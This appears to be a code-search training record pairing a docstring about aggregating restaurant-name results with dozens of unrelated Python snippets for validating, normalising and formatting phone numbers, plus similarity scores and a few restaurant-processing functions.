"def reg_phone(str_phone:str) -> object:\r\n\r\n [ind, nph]=str_phone.strip(\"+\").split(\" \")\r\n #Cut off the local 0\r\n #Create regexes for 3 cases : with IND and without 0, without IND and with 0, without IND and 0\r\n formats=[\\\r\n \"(?P<ind>{})? ?0?(?P<num>{})\".format(ind, ' ?'.join(list(nph.rstrip('0'))))\r\n ]\r\n return re.compile(f'({\"|\".join(formats)})')",
"def telephone(value, arg=None):\n \n # Normalise a number\n value = value.replace(\" \", \"\").replace(\"-\", \"\")\n if value.startswith(\"0\"):\n value = \"+44\" + value[1:]\n normalised = value\n \n # Check if it's a number which is formatted in a special way\n if normalised in UNUSUAL_NUMBERS:\n value = UNUSUAL_NUMBERS[normalised]\n else:\n # Figure out how to format that number\n \n # Convert UK numbers into national format\n if value.startswith(\"+44\"):\n value = \"0\" + value[3:]\n \n # Now apply rules on how to split up area codes\n if value[:8] in ('01332050', '01382006'):\n # Direct dial only\n value = value[:5] + \" \" + value[5:]\n elif value[:7] in ('0141005', '0117101') or value[:6] in ('011800',):\n # Direct dial only\n value = value[:4] + \" \" + value[4:7] + \" \" + value[7:]\n elif value[:7] in ('0200003',):\n # Direct dial only\n value = value[:3] + \" \" + value[3:7] + \" \" + value[7:]\n elif value.startswith('01'):\n if value[2] == '1' or value[3] == '1':\n # 4 digit area codes\n area_code = value[:4]\n local_part = value[4:7] + \" \" + value[7:]\n elif value[:6] in (\n '013873', # Langholm\n '015242', # Hornby\n '015394', # Hawkshead\n '015395', # Grange-over-Sands\n '015396', # Sedbergh\n '016973', # Wigton\n '016974', # Raughton Head\n '016977', # Brampton\n '017683', # Appleby\n '017684', # Pooley Bridge\n '017687', # Keswick\n '019467', # Gosforth\n ):\n # 6 digit area codes\n area_code = value[:4] + \" \" + value[4:6]\n local_part = value[6:]\n else:\n # 5 digit\n area_code = value[:5]\n local_part = value[5:]\n \n value = \"(%s) %s\" % (area_code, local_part)\n \n elif value.startswith('02'):\n # 3 digit area codes\n value = \"(%s) %s %s\" % (value[:3], value[3:7], value[7:])\n \n elif value.startswith('0500') or value.startswith('0800'):\n # direct dial - 4 digit prefix, short following\n value = \"%s %s\" % (value[:4], value[4:])\n \n elif value.startswith('03') or value.startswith('08') or value.startswith('09'):\n # direct dial - 4 digit prefix\n value = \"%s %s %s\" % (value[:4], value[4:7], value[7:])\n \n elif value.startswith('05') or value.startswith('070'):\n # direct dial - 3 digit prefix\n value = \"%s %s %s\" % (value[:3], value[3:7], value[7:])\n \n elif value.startswith('07'):\n # direct dial - 5 digit prefix, short following\n value = \"%s %s\" % (value[:5], value[5:])\n\n # Now apply University rules:\n if value[:10] in ('(01865) 27', '(01865) 28', '(01865) 43', '(01865) 61'):\n # Oxford - list of internal number prefixes here:\n # http://www.oucs.ox.ac.uk/telecom/directories/intdiraccess.xml\n value = \"(01865 \" + value[8] + \")\" + value[9:]\n\n if arg == 'nolink':\n return value\n else:\n return mark_safe('<a href=\"tel:%s\">%s</a>' % (normalised, value))",
"def clean_phone(number_str):\n number_str = number_str or ''\n number_str = number_str.replace('(', '').replace(')', '')\n number_str = number_str.replace('ext. ', 'x').replace('ext ', 'x')\n number_str = number_str.split(',')[0].strip()\n\n if number_str:\n return number_str",
"def test_address__normalize_phone_number__5():\n assert '01234567891' == normalize_phone_number('01234/5678-91', '')",
"def test_bad_phone():\n bad_phone = \"213-555-121\"\n m = CannedRe.PHONE.match(bad_phone)\n assert m is None, \"Canned RegEx phone test succeeded for %s while it should not\" % bad_phone",
"def validate_phone(self, data):\n value = data.strip()\n if re.match(constant.NUMBER_ONLY, value):\n if User.objects.filter(phone=value).exists():\n raise serializers.ValidationError('phone number already registered')\n return value\n raise serializers.ValidationError(VALIDATION['phone']['invalid'])",
"def update_phone(phone, phone_mapping):\n results = []\n for iphone in re.split(',|;',phone):\n patterns = phone_pattern_re.search(iphone)\n if patterns:\n numbers = patterns.groups()\n if numbers[0] == \"852\":\n results.append(re.compile(r'\\D?(\\d{0,4}?)\\D{0,2}(\\d{4})\\D?(\\d{4})$', iphone))\n elif numbers[0] in phone_mapping:\n results.append (\"+852\"+ \" \" + numbers[1] + numbers[2])\n return ';'.join(results)",
"def tidy_telephone(telephone):\n junk = ['none', 'none1', 'na', 'n/a', 'same', 'yes', 'cell', 'offsite']\n telephone = telephone.replace('xxx-xxx-xxxx', '')\n telephone = telephone.replace('ext', ' x')\n telephone = telephone.replace(' cell', '')\n telephone = telephone.replace('\"', '')\n telephone = telephone.replace('%', '')\n if telephone in junk:\n return ''\n else:\n return telephone",
"def _cleanse_phone_numbers(numbers):\n\n hit = False\n\n # Ensure we have a list.\n # Might have received a single string or long integer.\n if not isinstance(numbers, list):\n numbers = [numbers]\n\n cleansed_list = list()\n\n for i, elem in enumerate(numbers):\n\n # Only append if it's a valid email\n if elem is not None:\n\n # Convert integers (and others) to string\n wip = str(elem)\n\n # Isolate decimal numbers\n wip = ''.join(e for e in wip if e.isdecimal())\n\n # Strip leading 0 and 1s, if there was more than one decimal number\n if len(wip) > 1:\n while wip[0] in ['0', '1'] and len(wip) > 1:\n wip = wip[1:]\n\n # Append IFF we have a string with 10 digits\n if len(wip) == 10:\n cleansed_list.append(wip)\n hit = True\n\n else:\n pass\n\n # Handle case: No valid number-strings in the list\n cleansed_list = [None] if len(cleansed_list) == 0 else cleansed_list\n\n return cleansed_list, hit",
"def validate_phone(phone:str) -> bool:\r\n phone = phone.replace(\"-\", \"\").replace(\"(\", \"\").replace(\")\", \"\")\r\n return phone.isdigit() and len(phone) == 10",
"def fix_crappy_phone_number_formatting(phone_number):\n m = re.match(r'(\\d)?.?(\\d{3})\\D*(\\d{3})\\D*(\\d{4})\\D*(\\d*)$', phone_number)\n if m:\n fixed_number = f'+{m.group(1) or \"1\"}({m.group(2)}){m.group(3)}-{m.group(4)} {\"x\"+m.group(5) if m.group(5) else \"\"}'\n return fixed_number",
"def validate_phonenumber(self):\n special_chars = set(string.punctuation.replace('+', ''))\n for number in self.telefono:\n if number.isalpha() or number in special_chars:\n raise OspiteExc('Il campo numero di telefono non è valido')",
"def validate_phone_number(value):\n\n try:\n z = phonenumbers.parse(value, None)\n except phonenumbers.NumberParseException:\n raise forms.ValidationError(\"Enter a valid phone number.\")\n\n if not phonenumbers.is_valid_number(z):\n raise forms.ValidationError(\"Enter a valid phone number.\")",
"def invalid_phone_number(phonenumber):\n if all(digit.isdigit() for digit in phonenumber) \\\n and len(phonenumber) <= 10 and phonenumber.startswith(\"0\"):\n return False\n return True",
"def test_valid_phone_invalid():\n assert not valid_phone(\"\")\n assert not valid_phone(\"000-000-00000\")\n assert not valid_phone(\"000-0000-0000\")\n assert not valid_phone(\"0000-000-0000\")\n assert not valid_phone(\"00000000000\")\n assert not valid_phone(\"foobar\")",
"def validate_number(val):\n match = re.match('^\\+?[0-9]{7,15}$', val)\n if match is None:\n raise ValidationError(\"Alternate phone number is invalid.\")",
"def strip_non_num(phone):\n return ''.join([i for i in phone if i.isdigit()])",
"def validate_phone(value):\n if value.strip() == \"\":\n return\n try:\n phonenumbers.parse(value, \"US\")\n except phonenumbers.phonenumberutil.NumberParseException:\n raise ValidationError(\"Enter a valid phone number.\")",
"def search_by_phone_number(self, phone_number):\r\n if len(re.findall(\"[^0-9-+ ]+\", phone_number)) or len([c for c in phone_number if c == '+']) > 1:\r\n raise PersonPhoneNumberException(\"Invalid phone number search input. Can only contain digits, hyphens,\"\r\n \"spaces, and a plus sign(+).\")\r\n phone_number = phone_number.replace(' ', '')\r\n phone_number = phone_number.replace('-', '')\r\n phone_number = phone_number.replace('+4', '')\r\n return self.__filter(self.get_all_persons(), lambda x: phone_number in x.phone_number.replace(' ', ''))",
"def validate_telephone(self, data):\n value = data.strip()\n if re.match(constant.NUMBER_ONLY, value):\n if User.objects.filter(telephone=value).exists():\n raise serializers.ValidationError('telephone number already registered')\n return value\n raise serializers.ValidationError(VALIDATION['phone']['invalid'])",
"def test_10_phonenumbers_formatting_fr_CH(self):\n number_phone = self.samples[1]\n res = self.pn._symbol_set_char(number_phone)\n self.assertEqual(res, '+41411234567', 'e164 phone formatting failed')\n res = self.pn._symbol_get(number_phone)\n self.assertEqual(res, '+41 41 123 45 67', 'International phone formatting failed')",
"def parse_phone(s):\n pattern = '''\n ^\\s* # Leading spaces\n (?P<areacode>\n \\d{3}-? # \"xxx\" or \"xxx-\"\n | \\(\\d{3}\\)\\s* # OR \"(xxx) \"\n )\n (?P<prefix>\\d{3}) # xxx\n -? # Dash (optional)\n (?P<suffix>\\d{4}) # xxxx\n \\s*$ # Trailing spaces\n '''\n matcher = re.compile(pattern, re.VERBOSE)\n matches = matcher.match(s)\n if matches is None:\n print(s)\n return s\n else:\n areacode = re.search('\\d{3}', matches.group ('areacode')).group()\n prefix = matches.group ('prefix')\n suffix = matches.group ('suffix')\n return areacode+'-'+prefix+'-'+suffix",
"def validate_phone(self, value):\n pattern = re.compile(r'(^[+0-9]{1,3})*([0-9]{8,15}$)', re.IGNORECASE)\n value = value.replace(\" \", \"\")\n if pattern.match(value) is None:\n raise ValidationError(_('Please insert correct phone number.'))\n return value",
"def grab_area_code(phone_number):\r\n #number of form +1 XXX XXX XXXX (this should be the form get_twilio_client provides)\r\n if \"+1\" == phone_number[:2]:\r\n return phone_number[2:5]\r\n # number of form 1 XXX XXX XXXX\r\n if len(phone_number) == 11 and phone_number[0] == '1':\r\n return phone_number[1:4]\r\n # number of form XXX XXX XXXX\r\n if len(phone_number) == 10:\r\n return phone_number[:3]\r\n raise BadPhoneNumberError('\"%s\" is an invalid phone number.' % phone_number)",
"def parse_telephone(telephone, telephone_re):\n match = re.search(telephone_re, telephone)\n if match:\n return (telephone, False)\n else:\n return (telephone, True)",
"def get_valid_num(cls, phone_number):\n if type(phone_number) != str:\n return None\n elif cls.MAX_NUM_LEN < len(phone_number):\n return None\n else:\n extracted_num = cls.extract_digits(phone_number)\n if len(extracted_num) != cls.NUM_OF_DIGITS:\n return None\n return extracted_num",
"def __init__(self, phone_number):\n self.number = self.clean(phone_number)",
"def extract_digits(cls, phone_number):\n extracted_num = \"\"\n for ch in phone_number:\n if ch in cls.INTEGER_STRING:\n extracted_num += ch\n return extracted_num",
"def test_phone_too_short(self):\n phone = Report(\n contact_phone='202',\n )\n\n try:\n phone.full_clean()\n except ValidationError as err:\n phone_error_message = err.message_dict['contact_phone']\n self.assertTrue(phone_error_message == ['Enter a valid value.'])",
"def check_phone(val: Union[str, int, Any], clean: bool) -> Any:\n val = str(val)\n\n # If the value is null, return empty strings for the components\n # and \"null\" for the \"status\"\n if val in NULL_VALUES:\n return [\"\"] * 5 + [\"null\"] if clean else False\n\n mch = re.match(CA_US_PATTERN, re.sub(r\"''\", r'\"', val))\n # Check if the value was able to be parsed\n if not mch:\n return [\"\"] * 5 + [\"unknown\"] if clean else False\n if mch.group(\"country\") and not mch.group(\"area\"):\n return [\"\"] * 5 + [\"unknown\"] if clean else False\n\n # Components for phone number\n country_code = mch.group(\"country\")\n area_code = mch.group(\"area\")\n office_code = mch.group(\"office\")\n station_code = mch.group(\"station\")\n ext_num = mch.group(\"ext\")\n\n return (\n (country_code, area_code, office_code, station_code, ext_num, \"success\") if clean else True\n )",
"def test_good_phone():\n good_phone = \"213-555-1212\"\n m = CannedRe.PHONE.match(good_phone)\n# print getmembers(m)\n assert m is not None, \"Canned RegEx phone test failed for %s\" % good_phone\n assert m.string == good_phone",
"def testPhoneNumberValidation(self):\n \n fsd_tool = getToolByName(self.portal, TOOLNAME)\n desc = fsd_tool.getPhoneNumberDescription()\n self.failUnless(self.person.validate_officePhone('(555) 555-5555') is None)\n self.failUnless(self.person.validate_officePhone('555 555-5555') == \"Please provide the phone number in the format %s\" % desc)\n \n # Make sure a blank value for the phone number results in no validation\n self.failUnless(self.person.validate_officePhone('') is None, \"A blank value for officePhone should not be validated since officePhone is not a required field.\")\n \n # Make sure a blank value for the regex results in no validation.\n fsd_tool.setPhoneNumberRegex('')\n self.failUnless(self.person.validate_officePhone('555 555-5555') is None, \"A blank value for phoneNumberRegex should result in any value being accepted\")",
"def test_format_phone_none(self):\n number1 = None\n self.assertEqual(format_phone(number1), None)",
"def check_for_duplicate_phone_numbers(d):\n\n print('# This function is under maintenance. Please try again later.')\n return d",
"def phone_number_validator(phone_number):\n if len(phone_number) != 10:\n return False\n if phone_number[0] == '0':\n return False\n try:\n int(phone_number)\n except ValueError:\n return False\n return True",
"def create_phone_number(n):",
"def test_parse_phone(self):\n phone_dict = parse_phone('800-555-1234')\n self.assertTrue(str(phone_dict), \n \"{'area_code': '800', 'exchange': '555', 'number': '1234'}\")",
"def get_phone_numbers(r):\n phone_match = re.findall(r'\\d\\d\\d-\\d\\d\\d-\\d\\d\\d\\d', r)\n phone_list = []\n if phone_match:\n for match in phone_match:\n if match not in phone_list:\n phone_list.append(match)\n phone_list = set(phone_list)\n return phone_list",
"def is_phonenumber(number):\n\n phonenum = re.compile(r'^(\\d{3})-(\\d{3})-(\\d{4})$')\n if phonenum.match(number) is None:\n return False\n else:\n return True",
"def lookup_phone_number(phone):\n \n #create Twilio client\n client = Client(ACCOUNT_SID, AUTH_TOKEN)\n\n try:\n\n #check if number is real number using Twilio lookup\n phone_number = client.lookups \\\n .phone_numbers(phone) \\\n .fetch(type=['carrier'])\n\n #returns formmatted phone number\n return phone_number.phone_number\n\n #checks Twilio exception responses if number not real\n except TwilioRestException as e:\n\n #Number not found - return False\n if e.code == 20404:\n\n return False\n\n else:\n\n raise e",
"def numbers():\n return '<pre>' + '\\n'.join(phone_numbers) + '</pre>'",
"def parse_phone(parsed_data):\n result = []\n known_values = []\n\n contacts = {'registrant_contact': [], 'administrative_contact': [], 'technical_contact': [],\n 'domain_registrar' :[]}\n if 'registrant_contact' in parsed_data:\n contacts['registrant_contact'].append(parsed_data['registrant_contact'])\n if 'administrative_contact' in parsed_data:\n contacts['administrative_contact'].append(parsed_data['administrative_contact'])\n if 'technical_contact' in parsed_data:\n contacts['technical_contact'].append(parsed_data['technical_contact'])\n if 'domain_registrar' in parsed_data:\n contacts['domain_registrar'].append(parsed_data['domain_registrar'])\n # parsing phone number from contact block\n\n for contact, info in contacts.items():\n if info is not None:\n d = {'type': 4, 'data': '', 'properties': {}, 'special_properties': {}, 'ref': {}}\n # properties dictionary\n owener = {'type': 11, 'owner': ''}\n location = {'type': 11, 'location': ''}\n properties_list = []\n special_properties_list = []\n d.update({'ref': {'task': 'whois', 'whois_for': '', 'whois_from': ''}})\n if 'domain_name' in parsed_data and len(parsed_data['domain_name']) > 0:\n d['ref']['whois_for'] = parsed_data['domain_name']\n if 'whois_server' in parsed_data:\n d['ref']['whois_from'] = parsed_data['whois_server']\n\n for name in info:\n if \"phone_number\" in name:\n if name['phone_number'] in known_values:\n break\n for feature in name.keys():\n if feature == \"phone_number\":\n d['data'] = name['phone_number']\n known_values.append(name['phone_number'])\n if feature == \"full_name\":\n owener['owner'] = name['full_name']\n\n if feature ==\"registrar_name\":\n owener['owner'] = name['registrar_name']\n if feature == \"city_name\":\n location['location'] = name['city_name']\n # prevent from create result if phone number of contact is not available\n if d['data'] == '':\n continue\n properties_list.append(location)\n properties_list.append(owener)\n special_properties_list.append({'phone_type': '', 'type': 0})\n special_properties_list.append({'country_code': '', 'type': 0})\n special_properties_list.append({'operator': '', 'type': 0})\n special_properties_list.append({'is_valid': '', 'type': 0})\n d['special_properties'] = special_properties_list\n d['properties'] = properties_list\n result.append(d)\n return result",
"def phone_parser(phone, mode='PL'):\n\n if not phone:\n raise WrongInput(\"Input cannot be blank\")\n if not isinstance(phone, str):\n raise WrongInput(\"Invalid phone format\")\n\n if mode == 'PL':\n gsm_prefixes = ['50', '51', '53', '57', '60', '66', '69', '72', '73', '78', '79', '88']\n if phone[:2] in gsm_prefixes:\n phone_pattern = re.compile(r'''\n # don't match beginning of string\n (\\d{0,2}) # area code of 2 digits (e.g. '42')\n \\D* # optional separator\n (\\d{3}\\D*\\d{3}\\D*\\d{3}) # rest of number - divide into 3 3-digit sequences with optional separators\n # (e.g. '605-789-567')\n $ # end of string\n ''', re.VERBOSE)\n else:\n phone_pattern = re.compile(r'''\n # don't match beginning of string\n (\\d{0,2}) # area code of 2 digits (e.g. '42')\n \\D* # optional separator\n (\\d{3}\\D*\\d{2}\\D*\\d{2}) # rest of number - divide into 3 2-digit sequences with optional separators\n # (e.g. '605-78-56')\n $ # end of string\n ''', re.VERBOSE)\n else:\n phone_pattern = re.compile(r'''\n # don't match the beginning of the string\n (\\d{3}) # area code of 3 digits (e.g. '800')\n \\D* # optional separator\n (\\d{3}\\D*\\d{4}\\D*\\d+) # rest of number - divide into 3 sequences with optional separators: two obligatory\n # with 3 and 4 digits, one optional with any number of digits\n $ # end of string\n ''', re.VERBOSE)\n if not re.search(phone_pattern, phone):\n raise WrongInput(\"Invalid phone format.\")\n\n phone_obj = phone_pattern.search(phone)\n phone_area, phone_num = phone_obj.groups()\n phone = re.sub(r'\\D', '', phone_num)\n return phone, phone_area, phone_num",
"def test_20_phonenumbers_UnicodeDecodeError(self):\n number_phone = self.samples[2]\n with self.assertRaises(osv.except_osv):\n self.pn._symbol_set_char(number_phone)",
"def is_valid_phone(phone):\n assert phone is not None\n phone = str(phone)\n return len(phone) == 10 and is_valid_integer(phone)",
"def validate_phone_number(val):\n if not val.isdigit() or len(val) < 3:\n raise argparse.ArgumentTypeError(\"Invalid phone number\")\n return val",
"def ad_rep_lead_phone(obj):\n if obj.phone_number is None:\n phone_number = ''\n else:\n phone_number = format_phone(obj.phone_number)\n return \"%s\" % phone_number",
"def conform_phonenumber(\n s: str, region: Optional[str] = None\n ) -> Union[Invalid, str]:\n try:\n p = phonenumbers.parse(s, region=region)\n except phonenumbers.NumberParseException:\n return INVALID\n else:\n return phonenumbers.format_number(p, phonenumbers.PhoneNumberFormat.E164)",
"def phone_number():\r\n\r\n x = ''.join(str(_random.randrange(0, 10)) for i in xrange(10))\r\n y = '%s-%s-%s' % (x[0:3], x[3:6], x[6:])\r\n return y",
"def validatePhoneNumber(self):\n ## Declaring a Flag to control a while loop\n phone_number_ok = False\n ## While loop to have user retry their input if they enter incorrectly\n while not phone_number_ok:\n ## Asking for a phone number and checkig to see if it is 10 digits\n if self.phone_number.isdigit():\n if len(self.phone_number) == 10:\n phone_number_ok = True\n return True\n else:\n print(\"Please Enter a 10 digit phone number.\")\n return False\n \n else:\n print(\"You have enetered an invalid phone number. Please try again.\")\n return False",
"def strip_phone_prefix(self, phone_num):\n # FIXME more accurate check\n if phone_num.startswith('+86'):\n return phone_num.replace('+86', '')\n if len(phone_num) != 11:\n return None\n return phone_num",
"def validate_phone_number(phone_number):\n\n check = re.fullmatch(r\"^07\\d{8}\", phone_number)\n\n if check:\n return True\n else:\n return False",
"def mobile_validator(mobile):\n if mobile[0:4] != '+989':\n raise ValidationError('Invalid mobile')",
"def validatephone(self, send_to):\n\n self.send_to = send_to.lstrip('+')\n self.params = {\n 'api_key': self.phone_validate_api_key,\n 'phone' : self.send_to\n }\n response = requests.get(self.phone_validate_api_url,params=self.params)\n decoded_content = json.loads(response.content.decode('UTF-8'))\n is_phonenumber_valid = decoded_content['valid']\n\n return is_phonenumber_valid",
"def validate_mobile(self, mobile):\n self.mobile = mobile.strip()\n example = \"mobile number (ex. +2346787646)\"\n if re.match(r'(^[+0-9]{1,3})*([0-9]{10,11}$)',\n self.mobile) is None:\n raise GraphQLError(\n ERROR_RESPONSES[\"invalid_field_error\"].format(example))\n return self.mobile",
"def func2():\n\n\tnums = '''\n\t\t800-555-1212\n\t\t800 555 1212\n\t\t800.555.1212\n\t\t(800) 555-1212\n\t\t1-800-555-1212\n\t\t800-555-1212-1234\n\t\t800-555-1212x1234\n\t\t800-555-1212 ext. 1234\n\t\twork 1-(800) 555.1212 #1234\n\t'''\n\n\tpattern = r\"(\\d{3})\\D*(\\d{3})\\D*(\\d{4})\\D*(\\d*)$\"\n\tregex = re.compile(pattern)\n\n\tprint regex.search(\"800-555-1212\").groups()\n\tprint regex.search(\"800 555 1212\").groups()\n\tprint regex.search(\"800.555.1212\").groups()\n\n\tprint regex.search(\"(800) 555-1212\").groups()\n\tprint regex.search(\"1-800-555-1212\").groups()\n\n\tprint regex.search(\"800-555-1212-1234\").groups()\n\tprint regex.search(\"800-555-1212x1234\").groups()\n\n\tprint regex.search(\"800-555-1212 ext. 1234\").groups()\n\tprint regex.search(\"work 1-(800) 555.1212 #1234\").groups()",
"def scrape_phones(webpage):\n phones = []\n html = requests.get(webpage)\n phone_regex = re.compile(r'\\(?\\d{3}\\)?[-.\\s]\\d{3}[-.\\s]\\d{4}')\n phones = phone_regex.findall(html.text)\n return phones",
"def phone_numbers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TelephonyPhoneNumbersArgs']]]]:\n return pulumi.get(self, \"phone_numbers\")",
"def ldap_get_number(self, user):\n result = super(Auth42, self)._search_not_empty(user)\n if result is not None:\n number = result.get(\"mobile-phone\")[0]\n return number\n\n return None",
"def validate_phone_number(value, country_code='VN'):\n msg = _('Invalid phone number format.')\n try:\n phone = phonenumbers.parse(value, country_code)\n except:\n raise ValidationError(msg)\n if not phonenumbers.is_valid_number_for_region(phone, country_code):\n raise ValidationError(msg)\n return value",
"def _check_address(self):\n for object_ in self.objects:\n if object_.object_name.endswith(' ЕС'):\n if object_.object_address[:6].isnumeric():\n object_.object_address = \\\n object_.object_address[:7] + \\\n object_.object_fed_subj + ', ' + \\\n object_.object_address[7:]",
"def strip(phone):\n return re.sub('\\D', '', Phone.normalize(phone))",
"def valid_phone(phone_number):\n return bool(re.match(r\"^\\+?\\d{10,15}$\", phone_number))",
"def number(self, new_phone):\n returned_num = self.get_valid_num(new_phone)\n if returned_num is None:\n raise ValueError\n self._phone = returned_num",
"def check_as_htk_phone(phone):\n try:\n phone = str(phone)\n except UnicodeEncodeError:\n return False\n\n # Must not contain spaces\n phone_copy = phone.strip()\n if len(phone_copy) != len(phone):\n return False\n\n # Must contain characters!\n if len(phone) == 0:\n return False\n\n # Must not start by minus or plus\n if phone[0] in ['-', '+']:\n return False\n\n # Must not start by a digit\n try:\n int(phone[0])\n except ValueError:\n return False\n\n return True",
"def test_get_a_common_area_phone(self):\n pass",
"def phone_number(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"phone_number\")",
"def phone_number(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"phone_number\")",
"def remove_phone(body):\r\n phone = re.compile('[0-9]{7}|[0-9]{3}[\\- ][0-9]{3}[\\- ][0-9]{4}|[0-9]{10}|\\([0-9]{3}\\)[\\- ][0-9]{3}[\\- ][0-9]{4}')\r\n body = re.sub(phone, 'phone', body)\r\n return body",
"def save(self, *args, **kwargs):\n if self.phone is not None and self.phone.strip() == \"\":\n self.phone = None\n if self.phone is not None:\n try:\n phone_number = phonenumbers.parse(self.phone, \"US\")\n self.phone = phonenumbers.format_number(\n phone_number, phonenumbers.PhoneNumberFormat.E164\n )\n except phonenumbers.phonenumberutil.NumberParseException:\n raise ValidationError(\"Invalid phone number (this should have been caught already)\")\n super().save(*args, **kwargs)",
"def validate(number):\n number = compact(number)\n if len(number) != 10:\n raise InvalidLength()\n if not _nipt_re.match(number):\n raise InvalidFormat()\n return number",
"def get_phone(self, node, *, area_codes=[], error=True):\n\n if isinstance(node, etree._ElementUnicodeResult):\n match = re.search(\n r\"(?:\\A|\\D)(\\(?\\d{3}\\)?\\D?\\d{3}\\D?\\d{4}(?:\\s*(?:/|x|ext[.:]?|poste)[\\s-]?\\d+)?)(?:\\D|\\Z)\", node\n )\n if match:\n return match.group(1)\n match = node.xpath('.//a[contains(@href,\"tel:\")]')\n if match:\n return match[0].attrib[\"href\"].replace(\"tel:\", \"\")\n if area_codes:\n for area_code in area_codes:\n match = re.search(\n r\"(?:\\A|\\D)(\\(?%d\\)?\\D?\\d{3}\\D?\\d{4}(?:\\s*(?:/|x|ext[.:]?|poste)[\\s-]?\\d+)?)(?:\\D|\\Z)\" % area_code,\n node.text_content(),\n )\n if match:\n return match.group(1)\n else:\n match = re.search(\n r\"(?:\\A|\\D)(\\(?\\d{3}\\)?\\D?\\d{3}\\D?\\d{4}(?:\\s*(?:/|x|ext[.:]?|poste)[\\s-]?\\d+)?)(?:\\D|\\Z)\",\n node.text_content(),\n )\n if match:\n return match.group(1)\n if error:\n raise Exception(\"No phone pattern in {}\".format(node.text_content()))",
"def _remove_area_code(phone):\n\n if not phone.startswith('+46'):\n return phone\n else:\n return '0' + phone[3:]",
"def __ui_search_persons_by_phone_number(self):\n searched_phone_number = input(\"Introduce the phone number: \").strip().lower()\n if searched_phone_number == \"\":\n print(\"You cannot search persons by an empty phone number!\\n\")\n return\n\n searched_persons = self.__person_service.find_persons_by_phone_number(searched_phone_number)\n\n if len(searched_persons) == 0:\n print('There is no person whose phone number matches with \"{}\"!\\n'.format(searched_phone_number))\n else:\n print(\"\")\n for person in searched_persons:\n print(person)\n print(\"\")",
"def phoneDisplay(number):\n return number[0:3] + \" · \" + number[3:6] + \" · \" + number[6:10]"
] | [
"0.7204492",
"0.7189207",
"0.7125823",
"0.70673645",
"0.69369113",
"0.6922547",
"0.6824679",
"0.67972773",
"0.67830795",
"0.6771247",
"0.6759565",
"0.67235404",
"0.6691779",
"0.6690462",
"0.6681887",
"0.66814655",
"0.66740984",
"0.66468287",
"0.6635932",
"0.66335326",
"0.66268545",
"0.6614862",
"0.6589962",
"0.65839165",
"0.65721256",
"0.65580755",
"0.65546733",
"0.6552491",
"0.6533407",
"0.6518238",
"0.6516523",
"0.64995694",
"0.6493341",
"0.64178836",
"0.6393487",
"0.6392253",
"0.63798",
"0.63717294",
"0.6369214",
"0.6341162",
"0.6326811",
"0.6304788",
"0.6279889",
"0.62758476",
"0.6270565",
"0.62286705",
"0.6218895",
"0.6188276",
"0.618793",
"0.61840534",
"0.61832607",
"0.6139855",
"0.6125955",
"0.61172587",
"0.6111878",
"0.6108497",
"0.61048627",
"0.6081274",
"0.6070585",
"0.60528684",
"0.6048306",
"0.6033699",
"0.6032198",
"0.60298634",
"0.60211885",
"0.601841",
"0.6014427",
"0.6003208",
"0.60029054",
"0.6001315",
"0.599791",
"0.59876007",
"0.59806854",
"0.59644735",
"0.5949263",
"0.5932635",
"0.5932278",
"0.5903673",
"0.5897627",
"0.588323",
"0.58508646",
"0.5847529",
"0.5840725",
"0.58399045",
"0.5834058",
"0.58328503",
"0.583146",
"0.5828163",
"0.5825008",
"0.5782546",
"0.57689595",
"0.5768302",
"0.5768302",
"0.57517934",
"0.5732142",
"0.5723155",
"0.57143414",
"0.5710147",
"0.5704943",
"0.5700161"
] | 0.6447618 | 33 |
iterate through each restaurant name from restaurant names and aggregate to results | def results_aggregator(self, names):
for name in names:
result = self.main(name)
self.results.append(result)
print("'%s' has been written to the file." % result[0])
"""result is formatted name, number, rating, review count""" | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def resolveResult(self, restaurants):\n restaurant_list = []\n for restaurant in restaurants:\n restaurant_list.append({'Name': restaurant['restaurant']['name'], \"cuisines\": [x.strip() for x in restaurant['restaurant']['cuisines'].split(',')],\n \"lat\": restaurant['restaurant']['location']['latitude'], \"long\": restaurant['restaurant']['location']['longitude'], \"highlights\": restaurant['restaurant']['highlights'], \"Thumb\": restaurant['restaurant']['thumb'],\n \"user_Rating\": restaurant['restaurant']['user_rating']['aggregate_rating'],\"phone_Numbers\": restaurant['restaurant']['phone_numbers']})\n cuisineDict = { \"Chinese\":1, \"Korean\":2,\"Australia\":3,\"Japanese\":4,}\n WordDict = {1: \"cozy\",2: \"tasty\",3:'amazing',4:'flavorful',5:'yummy'}\n for i in range(len(restaurant_list)):\n icon = 5\n cuisines = restaurant_list[i][\"cuisines\"]\n adjective = WordDict[random.randint(1,5)]\n comment = \"This is a \"+ adjective\n if cuisines:\n if \"Chinese\" in cuisines:\n icon = 1\n elif \"Korean\" in cuisines:\n icon = 2\n elif \"Australia\" in cuisines:\n icon = 3\n elif \"Japanese\" in cuisines:\n icon = 4\n else:\n icon = 5\n comment = comment + \" \" + cuisines[0]\n restaurant_list[i]['icon'] = icon\n comment = comment + \" restaurant\"\n restaurant_list[i]['comment'] = comment\n res = {\"restaurants\":restaurant_list }\n return res",
"def processResults(results):\n restaurantDict = {}\n for result in results:\n rdict = {}\n name = result['name']\n location = result['location']\n rdict['name'] = name\n rdict['url'] = result['mobile_url']\n rdict['cuisine'] = result['categories']\n rdict['closed'] = result['is_closed']\n rdict['address'] = location['display_address'][0]\n if 'neighborhoods' in location:\n rdict['neighborhood'] = location['neighborhoods'][0]\n else:\n rdict['neighborhood'] = 'N/A'\n if 'display_phone' in result:\n rdict['phone'] = result['display_phone']\n rdict['city'] = str(location['city']) + \", \" + str(location['state_code'])\n rdict['rating'] = str(result['rating'])\n if ('coordinate' in result['location']):\n rdict['coords'] = [result['location']['coordinate']['latitude'], result['location']['coordinate']['longitude']]\n if rdict['city'] != rdict['address']:\n restaurantDict[name] = rdict\n\n return restaurantDict",
"def getRestaurantAddresses(restaurants):\n addresslist = []\n for rest in restaurants:\n if 'address' in rest:\n addressstring = str(rest['address']) + ' ' + str(rest['city'])\n addresslist.append(addressstring)\n\n # pprint.pprint(addresslist)\n return addresslist",
